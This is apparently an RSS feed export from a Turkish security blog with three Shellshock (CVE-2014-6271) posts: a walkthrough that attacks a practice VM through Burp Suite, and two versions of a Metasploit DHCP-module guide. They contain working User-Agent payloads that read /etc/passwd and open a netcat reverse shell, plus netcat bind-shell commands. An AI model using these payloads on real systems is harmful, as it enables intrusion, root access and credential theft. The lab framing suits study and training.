shellshock arşivleri • CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me cypm! Thu, 19 Apr 2018 19:50:39 +0000 tr hourly 1 https://wordpress.org/?v=6.0 https://canyoupwn.me/wp-content/uploads/2016/02/cropped-Başlıksız-1-32x32.png shellshock arşivleri • CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me 32 32 TR | ShellShock (CVE-2014-6271) https://canyoupwn.me/tr-cve-2014-6271-shellshock/ https://canyoupwn.me/tr-cve-2014-6271-shellshock/#respond Sun, 07 Feb 2016 19:55:50 +0000 http://canyoupwn.me/?p=410 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Merhabalar. Bu yazımızda CVE-2014-6271 kodlu Shellshock zaafiyeti için oluşturulan sanal makineden reverse shell alarak root yetkisi kazanmaya çalışacağız. Öncelikle iso kalıbına buraya tıklayarak ulaşabilirsiniz. İso kalıbını indirip herhangi bir sanallaştırma platformuna kurduğunuzu varsayarak devam ediyorum. İso kalıbını kurduktan sonra sizi karşılayan ekrana ‘ifconfig’ yazarak IP adresini alabilirsiniz. Verdiği IP adresini saldırmak için kullanacağınız makinede browsera […]

TR | ShellShock (CVE-2014-6271) CanYouPwnMe

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Merhabalar. Bu yazımızda CVE-2014-6271 kodlu Shellshock zaafiyeti için oluşturulan sanal makineden reverse shell alarak root yetkisi kazanmaya çalışacağız.

Öncelikle iso kalıbına buraya tıklayarak ulaşabilirsiniz.

İso kalıbını indirip herhangi bir sanallaştırma platformuna kurduğunuzu varsayarak devam ediyorum. İso kalıbını kurduktan sonra sizi karşılayan ekrana ‘ifconfig’ yazarak IP adresini alabilirsiniz. Verdiği IP adresini saldırmak için kullanacağınız makinede browsera yazıp girdiğinizde sizi aşağıdaki gibi bir ekran karşılıyor olacaktır.

2

Bu ekranı gördükten sonra hiçbir şey bilmeyen bir saldırganmışcasına ilk olarak CTRL + U ile sayfa kaynağını görüntülüyoruz ve orada aşağıdaki kod betiği dikkatimizi çekiyor.

3

Yukarıdaki CGI scripti sistem komutlarını çalıştırıp onları web sayfasında göstermeye yarıyor. Yani burada Shellshock zaafiyeti için hazır bir durum var.

BurpSuite programımızı açıyoruz.

‘Proxy’ sekmesinden ‘Intercept is on’ durumda olduğunu kontrol edip tekrar sayfamıza giriyoruz. Ardından sağ click yaparak ‘Send to Repeater’ diyoruz.

Biz burada HTTP isteklerini kullanarak saldırıyı gerçekleştirip ‘reverse shell’ almaya çalışacağız. Bunun için de ‘User Agent’ isimli HTTP Parametresini kullanacağız.

Bunun için daha önce ‘Repeater’ kısmında gönderdiğimiz isteğimizi görmek için, BurpSuite de üst kısımdan ‘Repeater’ sekmesini seçiyoruz ve isteğimiz karşımıza çıkıyor.

Ardından ‘User Agent’ kısmına:

 () { :; }; /bin/bash -c 'ping -c 3 172.168.2.1; id; cat /etc/passwd' 

kodunu ekliyoruz ve ‘Repeater’ kısmında bulunan ‘Go’ butonuna basarak etc/passwd dosyasını okumaya çalışıyoruz. Ve gelen değerlerde /etc/passwd dosyasını başarıyla okuduğumuzu görüyoruz.

4

Ardından, /etc/shadow v.s gibi dosyaları deneyip okuduktan sonra zaafiyeti tam olarak kullanabileceğimizi anlıyoruz. Bu durumda daha da ileri gidebilmek için içeriden bir erişim kazanma maksadıyla ‘reverse shell’ almaya çalışıyoruz. Bunun için, şu kodu yine ‘User-Agent’ kısmında kullanmamız gerekiyor.

() { :; }; /bin/bash -c 'nc IPADRESINIZ PORT -e /bin/sh'

Ardından, kullanacağımız portu da netcat ile dinlemeye almak için,

nc -lvp PORT

komutunu kullanmamız gerekiyor. Zaten ‘reverse shell’ almak için kullandığımız kodu detaylı incelerseniz nc komutu ile netcati aktifleştirdiğimizi görebilirsiniz.

‘Reverse shell’ kodumuzu ‘User-Agent’ parametresine eklemeden önce, yukaradaki ‘netcat’ komutu ile gerekli portu dinlemeye alıyoruz, ardından ‘Repeater’ sekmesindeki ‘Go’ butonuna ekrar basıp ‘reverse shell’imizi makineden alıyor ve içeriye erişim sağlıyoruz.

5

 

Başarılı bir biçimde bağlantıyı sağladıktan sonra,

sudo -s

komutuyla root olmaya çalıştığımızda şifre istemeden direkt olarak ‘root’ yetkilerini kazandık. Artık sistemde istediğimiz gibi at koşturabiliriz.

6

 

Yazımız burada sona eriyor, kafanıza takılan bir sorunuz olursa profilde bulunan iletişim adreslerinden bana ulaşabilirsiniz.

İyi shocklamalar!

TR | ShellShock (CVE-2014-6271) CanYouPwnMe

]]>
https://canyoupwn.me/tr-cve-2014-6271-shellshock/feed/ 0
EN | How to Hack the Shellshock Vulnerability with Metasploit Framework https://canyoupwn.me/en-how-to-hack-the-shellshock-vulnerability-with-metasploit-framework/ https://canyoupwn.me/en-how-to-hack-the-shellshock-vulnerability-with-metasploit-framework/#respond Thu, 04 Feb 2016 00:48:16 +0000 http://canyoupwn.me/?p=301 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

What is Shellshock?  Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash […]

EN | How to Hack the Shellshock Vulnerability with Metasploit Framework Mustafa Kaan Demirhan

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

What is Shellshock? 

Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

How to use?

  • Start the Metasploit Framework;
msfconsole
  • Search exploit;
search shellshock
  • Run the exploit;
use auxiliary/server/dhclient/dhclient_bash_env
  • We need these parameters “CMD” , “SRVHOST” VE “NETMASK”;
info
  • To view options;
show options
  • Set the DHCP server IP. This is the SRVHOST parameter;
set SVRHOST 192.168.131.61
  • Set the CMD;
set CMD /bin/nc -l -p6996 -e /bin/sh
  •  Set the NETMASK;
set NETMASK 255.255.255.0
  • Run the module;
exploit
  • Connect to the Exploited System;
c::\nc 192.168.131.61 6996
  • Returns the network settings of the exploited Linux system;
ifconfig
  • Confirm the privilage;
    whoami

 

EN | How to Hack the Shellshock Vulnerability with Metasploit Framework Mustafa Kaan Demirhan

]]>
https://canyoupwn.me/en-how-to-hack-the-shellshock-vulnerability-with-metasploit-framework/feed/ 0
TR | Metasploit Framework Yardımı ile Shellshock Zafiyetinden Yararlanma https://canyoupwn.me/tr-how-to-hack-the-shellshock-vulnerability/ https://canyoupwn.me/tr-how-to-hack-the-shellshock-vulnerability/#respond Thu, 04 Feb 2016 00:20:31 +0000 http://canyoupwn.me/?p=249 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Shellshock Nedir? Linux sistemlerde bash kabuğunda fark edilen güvenlik açığıdır. Nasıl Kullanılır? Metasploit Framework ü çalıştıyoruz; msfconsole Exploit i arıyoruz; search shellshock Exploit i yüklüyoruz. use auxiliary/server/dhclient/dhclient_bash_env Exploit için gerekli paremetlereler “CMD” , “SRVHOST” VE “NETMASK”. Bunları eğer görüntülemek istersek; info Seçenekleri görüntüleyip parametreleri düzenleme aşamasına geçersek; show options DHPC sunucu ip adresini değişmek için; […]

TR | Metasploit Framework Yardımı ile Shellshock Zafiyetinden Yararlanma Mustafa Kaan Demirhan

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Shellshock Nedir?

Linux sistemlerde bash kabuğunda fark edilen güvenlik açığıdır.

Nasıl Kullanılır?

  • Metasploit Framework ü çalıştıyoruz;
msfconsole
  • Exploit i arıyoruz;
search shellshock
  • Exploit i yüklüyoruz.
use auxiliary/server/dhclient/dhclient_bash_env
  • Exploit için gerekli paremetlereler “CMD” , “SRVHOST” VE “NETMASK”. Bunları eğer görüntülemek istersek;
info
  • Seçenekleri görüntüleyip parametreleri düzenleme aşamasına geçersek;
show options
  • DHPC sunucu ip adresini değişmek için;
set SVRHOST 192.168.131.61
  • CMD parametresini düzenlemek için;
set CMD /bin/nc -l -p6996 -e /bin/sh
  • Son parametremiz NETMASK için;
set NETMASK 255.255.255.0
  • Exploiti çalıştrmak için;
exploit
  • Çalıştırdıktan sonra durumu özet geçmek gerekirse hedefin CMD satırında Shellshock zafiyeti sayesinde root yetkisiyle “6996” nolu portla netcat yardımıyla bağlantı kurabiliriz. Exploitli sisteme bağlanmak için;
c::\nc 192.168.131.61 6996
  • Exploited Linux sistemin ayarlarına döndürmek için;
ifconfig

yapmamız yeterlidir.

  • Sistemdeki yetkimizi check etmek için;
whoami

yapıp root olup olmadığımızı doğrulayabiliriz.

TR | Metasploit Framework Yardımı ile Shellshock Zafiyetinden Yararlanma Mustafa Kaan Demirhan

]]>
https://canyoupwn.me/tr-how-to-hack-the-shellshock-vulnerability/feed/ 0